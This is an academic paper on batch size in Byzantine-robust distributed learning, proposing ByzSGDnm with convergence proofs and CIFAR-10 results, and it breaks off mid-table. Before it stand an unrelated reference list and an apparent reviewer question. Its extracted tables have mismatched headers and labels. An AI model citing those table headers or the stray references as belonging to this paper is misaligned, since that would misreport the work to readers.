Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, et al. Language models are few-shot learners. NeurIPS, 2020. Sébastien Bubeck, Varun Chandrasekaran, Ronen Eldan, Johannes Gehrke, Eric Horvitz, Ece Kamar, Peter Lee, Yin Tat Lee, Yuanzhi Li, Scott Lundberg, et al. Sparks of artificial general intelligence: Early experiments with gpt-4. arXiv, 2023. Finale Doshi-Velez and Been Kim. Towards a rigorous science of interpretable machine learning. arXiv, 2017. Google. Try bard, an ai experiment by google. https://bard.google.com/ (Accessed on 07/17/2023). Stefan Hegselmann, Alejandro Buendia, Hunter Lang, Monica Agrawal, Xiaoyi Jiang, and David Sontag. Tabllm: Few-shot classification of tabular data with large language models. In AISTATS. PMLR, 2023. Amr Hendy, Mohamed Abdelrehim, Amr Sharaf, Vikas Raunak, Mohamed Gabr, Hitokazu Matsushita, Young Jin Kim, Mohamed Afify, and Hany Hassan Awadalla. How good are gpt models at machine translation? a comprehensive evaluation. arXiv, 2023. Kaggle. Adult income dataset. https://www.kaggle.com/wenruliu/adult-income-dataset Accessed: 2020-01-01. Satyapriya Krishna, Tessa Han, Alex Gu, Javin Pomba, Shahin Jabbari, Steven Wu, and Himabindu Lakkaraju. The disagreement problem in explainable machine learning: A practitioner’s perspective. arXiv, 2022. Satyapriya Krishna, Jiaqi Ma, Dylan Slack, Asma Ghandeharioun, Sameer Singh, and Himabindu Lakkaraju. Post hoc explanations of language models can improve language models. arXiv, 2023. Jinhyuk Lee, Wonjin Yoon, Sungdong Kim, Donghyeon Kim, Sunkyu Kim, Chan Ho So, and Jaewoo Kang. Biobert: a pre-trained biomedical language representation model for biomedical text mining. Bioinformatics, 2020. Nelson F Liu, Kevin Lin, John Hewitt, Ashwin Paranjape, Michele Bevilacqua, Fabio Petroni, and Percy Liang. Lost in the middle: How language models use long contexts. arXiv, 2023a. Pengfei Liu, Weizhe Yuan, Jinlan Fu, Zhengbao Jiang, Hiroaki Hayashi, and Graham Neubig. Pre-train, prompt, and predict: A systematic survey of prompting methods in natural language processing. ACM Computing Surveys, 2023b. Scott M Lundberg and Su-In Lee. A unified approach to interpreting model predictions. In NeurIPS, 2017.
wriKDQqiOQ
As far as I know, the speed gain obtained by choosing a larger batch size is naturally explained by the fact that we can benefit from the parallelization of computations (in the system side). However, I would find it interesting to understand whether the methods presented are faster to reach a given accuracy with a larger batch size.
ON THE EFFECT OF BATCH SIZE IN BYZANTINE-ROBUST DISTRIBUTED LEARNING Yi-Rui Yang Chang-Wei Shi Wu-Jun Li∗ National Key Laboratory for Novel Software Technology, Department of Computer Science and Technology, Nanjing University, Nanjing, China {yangyr, shicw}@mail.nju.edu.cn, [email protected] ABSTRACT Byzantine-robust distributed learning (BRDL), in which computing devices are likely to behave abnormally due to accidental failures or malicious attacks, has recently become a hot research topic. However, even in the independent and identically distributed (i.i.d.) case, existing BRDL methods will suffer a significant drop on model accuracy due to the large variance of stochastic gradients. Increasing batch size is a simple yet effective way to reduce the variance. However, when the total number of gradient computation is fixed, a too-large batch size will lead to a too-small iteration number (update number), which may also degrade the model accuracy. In view of this challenge, we mainly study the effect of batch size when the total number of gradient computation is fixed in this work. In particular, we show that when the total number of gradient computation is fixed, the optimal batch size corresponding to the tightest theoretical upper bound in BRDL increases with the fraction of Byzantine workers. Therefore, compared to the case without attacks, a larger batch size is preferred when under Byzantine attacks. Motivated by the theoretical finding, we propose a novel method called Byzantine-robust stochastic gradient descent with normalized momentum (ByzSGDnm) in order to further increase model accuracy in BRDL. We theoretically prove the convergence of ByzSGDnm for general non-convex cases under Byzantine attacks. Empirical results show that when under Byzantine attacks, using a relatively large batch size can significantly increase the model accuracy, which is consistent with our theoretical results. Moreover, ByzSGDnm can achieve higher model accuracy than existing BRDL methods when under deliberately crafted attacks. In addition, we empirically show that increasing batch size has the bonus of training acceleration. 1 INTRODUCTION Distributed learning has attracted much attention (Haddadpour et al., 2019; Jaggi et al., 2014; Lee et al., 2017; Lian et al., 2017; Ma et al., 2015; Shamir et al., 2014; Sun et al., 2018; Yang, 2013; Yu et al., 2019a,b; Zhao et al., 2017; 2018; Zhou et al., 2018; Zinkevich et al., 2010) for years due to its wide application. In traditional distributed learning, it is typically assumed that there is no failure or attack. However, in some real-world applications such as edge-computing (Shi et al., 2016) and federated learning (McMahan & Ramage, 2017), the service provider (also known as the server) usually has weak control over computing nodes (also known as workers). In these cases, various software and hardware failures may happen on workers (Xie et al., 2019). Worse even, some workers may get hacked by a malicious third party and intentionally send wrong information to foil the distributed learning process (Kairouz et al., 2021). The workers under failure or attack are also called Byzantine workers. Distributed learning with the existence of Byzantine workers, which is also known as Byzantine-robust distributed learning (BRDL), has recently become a hot research topic (Bernstein et al., 2019; Bulusu et al., 2021; Chen et al., 2018; Damaskinos et al., 2018; Diakonikolas et al., 2017; Diakonikolas & Kane, 2019; Konstantinidis & Ramamoorthy, 2021; Lamport et al., 2019; Rajput et al., 2019; Sohn et al., 2020; Wu et al., 2020; Yang & Li, 2021; 2023; Yang et al., 2020; Yin et al., 2019). ∗Corresponding author. A typical way to obtain Byzantine robustness is to substitute the mean aggregator with robust aggregators such as Krum (Blanchard et al., 2017), geometric median (Chen et al., 2017), coordinate-wise median (Yin et al., 2018), centered clipping (Karimireddy et al., 2021), and so on. However, when there are Byzantine workers, even if robust aggregators are used, it is inevitable that an aggregation error will be introduced, which is the difference between the aggregated result and the true mean value. Furthermore, even in the independent and identically distributed (i.i.d.) cases, the aggregation error could be large due to the large variance of stochastic gradients (Karimireddy et al., 2021) which are typical values sent from workers to the server for parameter updating. The large aggregation error would make BRDL methods fail (Xie et al., 2020). It has been shown in existing works that the variance of the values from non-Byzantine workers can be reduced by using local momentum on workers (Allen-Zhu et al., 2020; El-Mhamdi et al., 2021; Farhaddhani et al., 2022; Karimireddy et al., 2021). However, as the empirical results in our work will show, even if local momentum has been used, existing BRDL methods will suffer a significant drop on model accuracy when under attacks. Therefore, more sophisticated techniques are required to further reduce the variance of stochastic gradients. Increasing batch size is a simple yet effective way to reduce the variance. However, when the total number of gradient computation is fixed, a too-large batch size will lead to a too-small iteration number (update number), which may also degrade the model accuracy (Goyal et al., 2017; Hoffer et al., 2017; Keskar et al., 2017; You et al., 2020; Zhao et al., 2020, 2023). In view of this challenge, we mainly study the effect of batch size in i.i.d. cases when the total number of gradient computation is fixed. The main contributions of this work are listed as follows: - We show that when the total number of gradient computation is fixed, the optimal batch size corresponding to the tightest theoretical upper bound in BRDL increases with the fraction of Byzantine workers. - Motivated by the theoretical finding, we propose a novel method called Byzantine-robust stochastic gradient descent with normalized momentum (ByzSGDnm) in order to further increase model accuracy in BRDL. - We theoretically prove the convergence of ByzSGDnm for non-convex cases under attacks. - We empirically show that when under Byzantine attacks, compared to the cases of small batch size, setting a relatively large batch size can significantly increase the model accuracy. Moreover, ByzSGDnm can achieve higher model accuracy than existing BRDL methods when under deliberately crafted attacks. - In addition, increasing batch size has the bonus of training acceleration, which is verified by our empirical results. ## 2 Preliminary In this paper, we mainly focus on the following optimization problem: $$\min_{w \in \mathbb{R}^d} F(w) = \mathbb{E}_{\xi \sim D}[f(w, \xi)],$$ where $w \in \mathbb{R}^d$ is the model parameter and $D$ is the distribution of training data. In addition, we mainly focus on the widely-used parameter-server (PS) framework in this work, where there are $m$ computing nodes (workers) that collaborate to train the learning model under the coordination of a central server. Each worker can independently draw samples $\xi$ from data distribution $D$. That is to say, we focus on the i.i.d. cases in this paper. Moreover, among the $m$ workers, a fraction of $\delta$ workers are Byzantine, which may behave abnormally and send arbitrary values to the server due to accidental failure or malicious attacks. The other workers, which are called non-Byzantine workers, will faithfully conduct the training algorithm without any fault. Formally, we use $G \subseteq \{1, 2, \ldots, m\}$ to denote the index set of non-Byzantine workers where $|G| = (1 - \delta)m$. The server has no access to any training data and does not know which workers are Byzantine. In this work, we mainly consider the loss functions that satisfy the following three assumptions, which are quite common in distributed learning. For simplicity, we use the notation $\|\cdot\|$ to denote the Euclidean norm of a vector. **Assumption 1 (Bounded variance).** There exists $\sigma \geq 0$, such that $\mathbb{E}_{\xi \sim D}\|\nabla f(w, \xi) - \nabla F(w)\|^2 \leq \sigma^2$ for all $w \in \mathbb{R}^d$. Assumption 2 (Lower bound of \( F(\cdot) \)). There exists \( F^* \in \mathbb{R} \) such that \( F(w) \geq F^* \) for all \( w \in \mathbb{R}^d \). Assumption 3 (\( L \)-smoothness). The loss function \( F(\cdot) \) is differentiable everywhere on \( \mathbb{R}^d \). Moreover, \[ \| \nabla F(w) - \nabla F(w') \| \leq L \| w - w' \| \quad \text{for all } w, w' \in \mathbb{R}^d. \] A typical and widely-used algorithm to solve the optimization problem (1) with potential Byzantine workers is Byzantine-robust stochastic gradient descent with momentum (ByzSGDm) (Farhadkhani et al., [2022]; Karimireddy et al., [2021]). Compared with vanilla stochastic gradient descent with momentum (SGDm), the main difference in ByzSGDm is that the mean aggregator on the server is substituted by a robust aggregator. Specifically, in ByzSGDm, the server updates the model parameter at the \( t \)-th iteration by computing \[ w_{t+1} = w_t - \eta_t \cdot \text{Agg}(u^{(1)}_t, \ldots, u^{(m)}_t), \] where \( \eta_t \) is the learning rate and \( \text{Agg}(\cdot) \) is a robust aggregator. Local momentum \( u^{(k)}_t \) is received from the \( k \)-th worker \( (k = 1, 2, \ldots, m) \). For each non-Byzantine worker \( k \in G \), \[ u^{(k)}_t = \begin{cases} g^{(k)}_0, & t = 0; \\ \beta u^{(k)}_{t-1} + (1 - \beta) g^{(k)}_t, & t > 0, \end{cases} \] where \( \beta \) is the momentum hyper-parameter and \( g^{(k)}_t = \frac{1}{B} \sum_{b=1}^{B} \nabla f(w_t, \xi^{(k,b)}_t) \) is the mean value of a mini-batch of stochastic gradients with size \( B \). For each Byzantine worker \( k \in [m] \setminus G \), \( u^{(k)}_t \) can be an arbitrary value. For space saving, more details about ByzSGDm are moved to Algorithm 2 and Algorithm 3 in Appendix A. For a ‘good’ aggregator, the aggregated result \( \text{Agg}(u^{(1)}_t, \ldots, u^{(m)}_t) \) should be close to the true mean of the momentums on non-Byzantine workers, which can be written as \( \frac{1}{|G|} \sum_{k \in G} u^{(k)}_t \). To quantitatively measure a robust aggregator, the definition of \( (\delta_{\max}, c) \)-robust aggregator has been proposed in existing works (Karimireddy et al., [2021]), which we present in Definition 1 below. Definition 1 ((\( \delta_{\max}, c \))-robust aggregator (Karimireddy et al., [2021])). Let \( 0 \leq \delta_{\max} < \frac{1}{2} \) and \( c \geq 0 \). Random vectors \( x_1, \ldots, x_m \in \mathbb{R}^d \) satisfy that \( \mathbb{E}[x_k - x_{k'}]^2 \leq \rho^2 \) for all fixed \( k, k' \in G \), where \( G \subseteq \{1, \ldots, m\} \) and \( |G| = (1 - \delta)m \). An aggregator \( \text{Agg}(\cdot) \) is called a \( (\delta_{\max}, c) \)-robust aggregator if we always have that \[ \mathbb{E}\|e\|^2 \leq c \delta \rho^2, \] when \( \delta \leq \delta_{\max} \). Here, \( e = \text{Agg}(x_1, \ldots, x_m) - \frac{1}{|G|} \sum_{k \in G} x_k \) is called the aggregation error. In addition, it has been proved that for any potential robust aggregator, there is inevitably an aggregation error of \( \Omega(\delta \rho^2) \) in the worst case (Karimireddy et al., [2021]). It has also been proved that some existing aggregators such as centered clipping (Karimireddy et al., [2021]) satisfy Definition 1. 3 METHODOLOGY 3.1 EFFECT OF BATCH SIZE ON CONVERGENCE As shown in existing works on Byzantine-robust distributed learning (Blanchard et al., [2017]; Chen et al., [2017]; Li et al., [2019]; Yin et al., [2018]), even if robust aggregators have been used, there is typically a drop on model accuracy under Byzantine attacks due to the aggregation error. Therefore, we attempt to alleviate the drop on model accuracy by reducing the aggregation error. According to Definition 1, there are three variables related to the upper bound of aggregation error. The fraction of Byzantine workers \( \delta \) is determined by the problem, which can hardly be reduced. The constant \( c \) is mainly related to the specific robust aggregator. There have been many works (Blanchard et al., [2017]; Chen et al., [2017]; Karimireddy et al., [2021]; Li et al., [2019]; Yin et al., [2018]) that propose various robust aggregators. In this work, we mainly attempt to reduce \( \rho \). Moreover, we focus on the i.i.d. setting in this work. Since \( \mathbb{E}[x_k] = \mathbb{E}[x_{k'}] \) in this case, according to Assumption 1, we have \[ \mathbb{E}\|x_k - x_{k'}\|^2 = \mathbb{E}\|(x_k - \mathbb{E}[x_k]) - (x_{k'} - \mathbb{E}[x_{k'}])\|^2 = \mathbb{E}\|x_k - \mathbb{E}[x_k]\|^2 + \mathbb{E}\|x_{k'} - \mathbb{E}[x_{k'}]\|^2 \leq 2\sigma^2, \] (2) which implies that \( \rho^2 \leq 2\sigma^2 \) in i.i.d. cases under Assumption 1. Therefore, we can reduce \( \rho \) by reducing the variance \( \sigma^2 \) in i.i.d. cases. A simple but effective way to reduce the variance is increasing the batch size on each worker, which is denoted by \( B \) in this paper. For simplicity, we assume that all workers adopt the same batch size in this work. Compared to the case with batch size 1, the variance of stochastic gradients will be reduced to \( 1/B \) of the original if the batch size is set to \( B \). However, to make the total number of gradient computation unchanged, the total iteration number will be reduced to \( 1/B \) of the original, leading to fewer times of model updating. Formally, we use \( C = TBm(1 - \delta) \) to denote the total number of gradient computation on non-Byzantine workers, where \( T \) is the total iteration number. Thus, we have \( T = \frac{C}{Bm(1 - \delta)} \). It implies that a larger batch size \( B \) will lead to a smaller total iteration number \( T \) when the total number of gradient computation \( C \) is fixed. In many BRDL applications with deep learning models, \( C \) can be used to approximately evaluate the computation cost since the computation cost of robust aggregation and model updating is negligible compared to that of gradient computation. We first recall the convergence of ByzSGDm, which has been adequately studied in existing works (Karimireddy et al., 2021). We restate the convergence results of ByzSGDm in Theorem 1 below. For space saving, the details of how Theorem 1 is obtained from existing results (Karimireddy et al., 2021) are presented in Appendix B. **Theorem 1** (Convergence of ByzSGDm (Karimireddy et al., 2021)). Suppose that \( F(w_0) - F^* \leq F_0 \). Under Assumptions 1, 2, and 3, when \( \text{Agg}(\cdot) \) is \( (\delta_{\max}, c) \)-robust and \( \delta \leq \delta_{\max} \), setting \( \eta_t = \eta = \min \left( \sqrt{\frac{F_0 + \frac{5c\delta m}{8L}}{20LT\sigma^2}}, \frac{1}{8L} \right) \) and \( 1 - \beta = 8L\eta \), we have the following result for ByzSGDm: \[ \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E}\|\nabla F(w_t)\|^2 \leq 16\sqrt{\frac{\sigma^2(1 + c\delta m)}{TBm}} \left( \sqrt{10LF_0} + \sqrt{\frac{3c\delta \sigma^2}{B}} \right) + \frac{32LF_0}{T} + \frac{20\sigma^2(1 + c\delta m)}{TBm}. \] When \( C \) is fixed, inequality (3) can be re-written as \( \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E}\|\nabla F(w_t)\|^2 \leq U(B) \) since \( T = \frac{C}{Bm(1 - \delta)} \), where \( U(B) \) is a real-valued function with respect to batch size \( B \). Specifically, \[ U(B) = 16\sqrt{\frac{\sigma^2(1 + c\delta m)(1 - \delta)}{C}} \left( \sqrt{10LF_0} + \sqrt{\frac{3c\delta \sigma^2}{B}} \right) + \frac{32LF_0Bm(1 - \delta)}{C} + \frac{20\sigma^2(1 + c\delta m)(1 - \delta)}{C}. \] Please note that \( U(B) \) is originally defined on the set of positive integers \( \mathbb{N}^+ \) since \( B \) denotes the batch size. We here extend the definition of \( U(B) \) to \( B \in (0, +\infty) \) for simplicity. The results will be interpreted back to \( B \in \mathbb{N}^+ \) at the end of our analysis. Then we attempt to find the optimal batch size \( B^* \) that minimizes the theoretical upper bound \( U(B) \) when \( C = TBm(1 - \delta) \) is fixed. Formally, \( B^* \) is defined by the following optimization problem: \[ B^* = \arg\min_{B \in (0, +\infty)} U(B). \] We present Proposition 1 below, which provides an explicit expression of \( B^* \). Please refer to Appendix B for the proof details. **Proposition 1.** \( U(B) \) is strictly convex on \( (0, +\infty) \). Moreover, when \( \delta > 0 \), we have \[ B^* = \left( \frac{3}{16L^2(F_0)^2m} \right)^{\frac{1}{3}} \left( \frac{c\delta(1 + c\delta m)}{m(1 - \delta)} \right)^{\frac{1}{3}} \sigma^{\frac{4}{3}}C^{\frac{1}{3}}, \] and \[ U(B^*) = \frac{16\sqrt{10LF_0(1 + c\delta m)(1 - \delta)\sigma}}{C^{\frac{1}{2}}} + \frac{24\left[12c\delta(1 + c\delta m)(1 - \delta)^2LF_0m\right]^{\frac{1}{2}}\sigma^{\frac{4}{3}}}{C^{\frac{2}{3}}} + \frac{20(1 + c\delta m)(1 - \delta)\sigma^2}{C}. \] Algorithm 1 Byzantine-Robust SGD with Normalized Momentum (ByzSGDnm) Input: initial model parameter \( w_0 \), worker number \( m \), iteration number \( T \), learning rates \( \{ \eta_t \}_{t=0}^{T-1} \), batch size \( B \), momentum hyper-parameter \( \beta \in [0, 1) \), robust aggregator \( \text{Agg}(\cdot) \); for \( t = 0 \) to \( T - 1 \) do Broadcast \( w_t \) to all workers; on worker \( k \in \{1, \ldots, m\} \) in parallel do Receive \( w_t \) from the server; Independently draw \( B \) samples \( \xi_t^{(k,1)}, \ldots, \xi_t^{(k,B)} \) from distribution \( D \); Compute \( g_t^{(k)} = \frac{1}{B} \sum_{b=1}^{B} \nabla f(w_t, \xi_t^{(k,b)}) \); Update local momentum \( u_t^{(k)} = \begin{cases} g_0^{(k)}, & t = 0; \\ \beta u_{t-1}^{(k)} + (1 - \beta) g_t^{(k)}, & t > 0; \end{cases} \) Send \( u_t^{(k)} \) to the server (Byzantine workers may send arbitrary values at this step); end on worker Receive \( \{u_t^{(k)}\}_{k=1}^{m} \) from the \( m \) workers, and compute \( u_t = \text{Agg}(u_t^{(1)}, \ldots, u_t^{(m)}) \); Update model parameter with normalized momentum: \( w_{t+1} = w_t - \eta_t \frac{u_t}{\|u_t\|} \); end for Output model parameter \( w_T \). Please note that \( U(B) \) has no more than one global minimizer due to the strict convexity. Thus, \( B^* \) is well-defined when \( \delta > 0 \). Furthermore, the term \( \left( \frac{c \delta (1 + c \delta m)}{m (1 - \delta)} \right)^{\frac{1}{2}} \) in (4) is monotonically increasing with respect to \( \delta \). It implies that when the total number of gradient computation on non-Byzantine workers \( C = TBm(1 - \delta) \) is fixed, \( B^* \) will increase as the fraction of Byzantine workers \( \delta \) increases. Then, we interpret the above results back to \( B \in \mathbb{N}^* \). Due to the strict convexity, \( U(B) \) is monotonically decreasing when \( B \in (0, B^*) \) and monotonically increasing when \( B \in (B^*, +\infty) \). Thus, the optimal integer batch size that minimizes \( U(B) \) equals either \( \lfloor B^* \rfloor \) or \( \lceil B^* \rceil + 1 \), which also increases with \( \delta \). The notation \( \lfloor B^* \rfloor \) represents the largest integer that is not larger than \( B^* \). In addition, the conclusion will be further supported by the empirical results in Section 5. Meanwhile, although \( B^* \to 0 \) as \( \delta \to 0^+ \), it should not be interpreted as recommending a batch size that is close to 0 when there is no attack. In fact, since \( C \) is fixed, a too-small batch size \( B \) implies a too-large iteration number \( T \), which will lead to a large communication cost. Moreover, the computation power of some devices (e.g., GPUs) will not be effectively utilized when \( B \) is too small. Thus, the setting of \( B \) is a trade-off between model accuracy and running time when \( \delta = 0 \), which has been studied for years (Goyal et al., 2017; You et al., 2020; Zhao et al., 2020, 2023). In addition, please note that although a smaller \( U(B) \) does not necessarily ensure a better empirical performance given the complexity and variety in real-world applications, it provides a better worst-case guarantee. 3.2 Byzantine-Robust SGD with Normalized Momentum Proposition 1 shows that the optimal batch size \( B^* \) that minimizes \( U(B) \) increases with the fraction of Byzantine workers. Hence, a relatively large batch size is preferred when under Byzantine attacks. In existing works on traditional large-batch training without attacks (Goyal et al., 2017; Hoffer et al., 2017; Keskar et al., 2017; Zhao et al., 2020, 2023), the normalization technique is widely used to increase model accuracy. Motivated by this, we propose a novel method called Byzantine-robust stochastic gradient descent with normalized momentum (ByzSGDnm), by introducing a simple normalization operation. Specifically, in ByzSGDnm, the model parameters are updated by: \[ w_{t+1} = w_t - \eta_t \cdot \frac{\text{Agg}(u_t^{(1)}, \ldots, u_t^{(m)})}{\|\text{Agg}(u_t^{(1)}, \ldots, u_t^{(m)})\|}. \] The details of ByzSGDnm are illustrated in Algorithm 1. Please note that there are some existing methods using layer-wise normalization (You et al., 2020). However, these methods might suffer from degradation of model accuracy without additional training tricks such as warm-up (Zhao et al., 2023). Furthermore, as shown in (Zhao et al., 2023), the layer-wise (block-wise) normalization might slow down the convergence rate. Hence, we follow the way of performing normalization on the whole momentum (Zhao et al., 2020, 2023; Cutkosky & Mehta, 2020). Moreover, please note that the purpose of traditional large-batch training (Goyal et al., 2017; You et al., 2020; Zhao et al., 2020, 2023) is mainly to accelerate the training process by reducing communication cost and utilizing the computation power more effectively. However, in this work, the main purpose of increasing batch size and using momentum normalization is to enhance the Byzantine robustness and increase the model accuracy under Byzantine attacks. The acceleration effect of adopting large batch size is viewed as a bonus in this work. Please refer to Section 5 for the empirical results about the wall-clock time of ByzSGDm and ByzSGDnm with different batch size. 4 CONVERGENCE In this section, we theoretically analyze the convergence of ByzSGDnm under Assumptions 1, 2, and 3. The assumptions are common in distributed learning. For space saving, we only present the main results here. Please refer to Appendix B for the proof details. **Theorem 2.** Suppose that \( F(w_0) - F^* \leq F_0 \) and let \( \alpha = 1 - \beta \). Under Assumptions 1, 2, and 3 when \( \text{Agg}(\cdot) \) is \( (\delta_{\max}, c)\)-robust, \( \delta \leq \delta_{\max} \) and \( \eta_t = \eta \), we have the following result for ByzSGDnm: \[ \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E} \| \nabla F(w_t) \| \leq \frac{2F_0}{\eta T} + \frac{10\eta L}{\alpha} + \frac{9\sqrt{2cm\delta(1-\delta)} + 9}{\sqrt{Bm(1-\delta)}} \left( \frac{1}{\alpha T} + \sqrt{\alpha} \right) \sigma. \] Finally, we show that when the learning rate \( \eta \) and the momentum hyper-parameter \( \beta = 1 - \alpha \) are properly set, ByzSGDnm can achieve the convergence order of \( O\left(\frac{1}{T^{\frac{1}{4}}}\right) \) by Proposition 2 below. **Proposition 2.** Under Assumptions 1, 2, and 3 when \( \text{Agg}(\cdot) \) is \( (\delta_{\max}, c)\)-robust and \( \delta \leq \delta_{\max} \), setting \( 1 - \beta = \alpha = \min \left( \frac{\sqrt{80LF_0Bm(1-\delta)}}{9\sqrt{2cm\delta(1-\delta)} + 9}, \sigma \sqrt{T}, 1 \right) \) and \( \eta_t = \eta = \sqrt{\frac{\alpha F_0}{5LT}} \), we have that \[ \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E} \| \nabla F(w_t) \| \leq 6 \left[ \sqrt{2cm\delta(1-\delta)} + 1 \right]^{\frac{1}{2}} \left( \frac{5LF_0\sigma^2}{TBm(1-\delta)} \right)^{\frac{1}{4}} + 12 \sqrt{\frac{5LF_0}{T}} \\ + \frac{27}{4\sqrt{5TB^2m^2(1-\delta)^2LF_0}} \sigma^2. \] Moreover, when \( C = TBm(1-\delta) \) is fixed, the optimal batch size \( \tilde{B}^* \) that minimizes the right-hand side of (5) is \( \tilde{B}^* = \frac{9\sqrt{2cm\delta(1-\delta)} + 1}{80m(1-\delta)LF_0} \sigma^2 \). In this case \( (B = \tilde{B}^*) \), we have: \[ \frac{1}{T} \sum_{t=0}^{T-1} \mathbb{E} \| \nabla F(w_t) \| \leq 6 \left[ \sqrt{2cm\delta(1-\delta)} + 1 \right]^{\frac{1}{2}} \left( \frac{5LF_0\sigma^2}{C^{\frac{1}{4}}} \right)^{\frac{1}{4}} + \frac{18}{C^{\frac{1}{2}}} \left[ \sqrt{2cm\delta(1-\delta)} + 1 \right]^{\frac{3}{4}} \sigma. \] Inequality (5) illustrates that after \( T \) iterations, ByzSGDnm can guarantee that \[ \min_{t=0,\ldots,T-1} \mathbb{E} \| \nabla F(w_t) \| \leq O \left( \frac{(LF_0)^{\frac{1}{4}} \sqrt{\sigma}}{T^{\frac{1}{4}}} + \frac{1}{T^{\frac{1}{2}}} \right). \] Therefore, ByzSGDnm has the same convergence order as vanilla SGD with normalized momentum (Cutkosky & Mehta, 2020) without attacks. The extra factor \( \left[ \sqrt{2cm\delta(1-\delta)} + 1 \right]^{\frac{3}{4}}/(1-\delta)^{\frac{1}{4}} \) in the right-hand side (RHS) of (5) is due to the existence of Byzantine workers and increases with \( \delta \). The extra factor vanishes (equals 1) when there is no Byzantine worker \( (\delta = 0) \). Moreover, it has been shown in existing works (Arjevani et al., 2023; Cutkosky & Mehta, 2020) that under Assumptions 1, 2, and 3, the convergence order \( O(1/T^{\frac{1}{4}}) \) is optimal for SGD. Byz-VR-MARINA (Gorbunov et al., 2023) achieves a better convergence order by intermittently using full gradients. However, full gradients are computationally expensive, especially in real-world applications with a large number of training instances. We detailedly compare ByzSGDnm with Byz-VR-MARINA in Appendix D. The empirical results show that ByzSGDnm significantly outperforms Byz-VR-MARINA. In addition, \( \tilde{B}^* \) also increases with \( \delta \) since both \( \delta(1-\delta) \) and \( \frac{1}{1-\delta} \) increase with \( \delta \) when \( \delta \in [0, \frac{1}{2}) \). The analysis in this paper is based on the definition of \((\delta_{\text{max}}, c)\)-robust aggregator (Definition 1). There is also another criterion of robust aggregators in existing works called the \((f, \kappa)\)-robustness (Al-Iouah et al., 2023). Similar results can also be obtained under the \((f, \kappa)\)-robustness. Please refer to Appendix C for more details. 5 EXPERIMENT Task and platform. In this section, we will empirically test the performance of ByzSGDm and ByzSGDnm on image classification tasks. Each algorithm will be used to train a ResNet-20 (He et al., 2016) deep learning model on CIFAR-10 dataset (Krizhevsky et al., 2009). All the experiments presented in this work are conducted on a distributed platform with 9 dockers. Each docker is bound to an NVIDIA TITAN Xp GPU. One docker is chosen as the server while the other 8 dockers are chosen as workers. The training instances are randomly and equally distributed to the workers. Experimental settings. In existing works (Alouah et al., 2023; Karimireddy et al., 2021, 2022) on BRDL, the batch size is typically set to 32 or 50 on the CIFAR-10 dataset. Therefore, We set ByzSGDm (Karimireddy et al., 2021) with batch size 32 as the baseline, and compare the performance of ByzSGDm with different batch size (ranging from 64 to 1024) to the baseline under ALIE attack (Baruch et al., 2019). In our experiments, we use four widely-used robust aggregators Krum (KR) (Blanchard et al., 2017), geometric median (GM) (Chen et al., 2017), coordinate-wise median (CM) (Yin et al., 2018) and centered clipping (CC) (Karimireddy et al., 2021) for ByzSGDm. Moreover, we set the clipping radius to 0.1 for CC. We train the model for 160 epochs with cosine annealing learning rates (Loshchilov & Hutter, 2017). Specifically, the learning rate at the \(i\)-th epoch will be \(\eta_i = \frac{\eta_0}{2} (1 + \cos(\frac{i\pi}{159}))\) for \(i = 0, 1, \ldots, 159\). The initial learning rate \(\eta_0\) is selected from \{0.1, 0.2, 0.5, 1.0, 2.0, 5.0, 10.0, 20.0\}, and the best final top-1 test accuracy is used as the final metrics. The momentum hyper-parameter \(\beta\) is set to 0.9. Please note that the total number of gradient computation on non-Byzantine workers \(C\) is independent of batch size. Specifically, \(C = 160 \times 50000 \times (1 - \delta)\) since we train the model for 160 epochs with 50000 training instances. Evaluation on the effect of batch size. We first evaluate the performance of ByzSGDm with different batch size when the fraction of Byzantine workers \(\delta\) is 0 (no attack), \(\frac{1}{8}\) and \(\frac{3}{8}\), respectively. As the results in Table 1 and Table 2 show, the batch size corresponding to the best top-1 accuracy increases with \(\delta\), which is consistent with our theoretical results. Moreover, when \(\delta = \frac{3}{8}\), using a relatively large batch size greatly increases the test accuracy. Meanwhile, the test accuracy decreases with the batch size when there is no attack (\(\delta = 0\)), which is consistent with existing works (Goyal et al., 2017; Hoffer et al., 2017; Keskar et al., 2017; You et al., 2020; Zhao et al., 2020, 2023). Table 1: The final top-1 test accuracy of ByzSGDm with various batch size under ALIE attack when Krum (KM) and geometric median (GM) are used as the robust aggregator | Batch size | ByzSGDm with KR | ByzSGDm with GM | |------------|----------------|----------------| | | \(\delta = 0\) | \(\delta = 1/8\) | \(\delta = 3/8\) | | 32×8 (baseline) | **91.08%** | 55.84% | 38.55% | | 64×8 | 89.98% (-1.10%) | 63.22% (+7.38%) | 54.15% (+15.60 %) | | 128×8 | 89.71% (-1.37%) | 75.06% (+19.22%) | 55.98% (+17.43%) | | 256×8 | 89.15% (-1.93%) | 84.47% (+28.63%) | 59.28% (+20.73%) | | 512×8 | 86.15% (-4.93%) | **85.68%** (+29.84%) | 83.42% (+44.87%) | | 1024×8 | 84.97% (-6.11%) | 83.48% (+27.64%) | **83.45%** (+44.90%) | | Batch size | ByzSGDm with KR | ByzSGDm with GM | |------------|----------------|----------------| | | \(\delta = 0\) | \(\delta = 1/8\) | \(\delta = 3/8\) | | 32×8 (baseline) | **92.02%** | 83.81% | 63.11% | | 64×8 | 91.50% (-0.52%) | 87.92% (+4.11%) | 70.88% (+7.77%) | | 128×8 | 90.85% (-1.17%) | **89.68%** (+5.87%) | 82.08% (+18.97%) | | 256×8 | 89.26% (-2.76%) | 87.99% (+4.18%) | **87.62%** (+24.51%) | | 512×8 | 88.21% (-3.81%) | 87.70% (+3.89%) | 86.95% (+23.84%) | | 1024×8 | 86.52% (-5.50%) | 85.94% (+2.13%) | 84.75% (+21.64%) | Table 2: The final top-1 test accuracy of ByzSGDm with various batch size under ALIE attack when coordinate-wise median (CM) and centered clipping (CC) are used as the robust aggregator | Batch size | ByzSGDm with CM | ByzSGDm with CC | |------------|----------------|----------------| | | δ = 0 | δ = 1/8 | δ = 3/8 | | 32×8 (baseline) | 92.30% | 86.46% | 33.11% | | 64×8 | 91.79% (-0.51%) | 88.09% (+1.63%) | 55.66% (+22.55%) | | 128×8 | 90.43% (-1.87%) | 89.16% (+2.70%) | 66.38% (+33.27%) | | 256×8 | 89.84% (-2.46%) | 88.60% (+2.14%) | 82.47% (+49.36%) | | 512×8 | 87.27% (-5.03%) | 87.20% (+0.74%) | 83.25% (+50.14%) | | 1024×8 | 84.06% (-8.24%) | 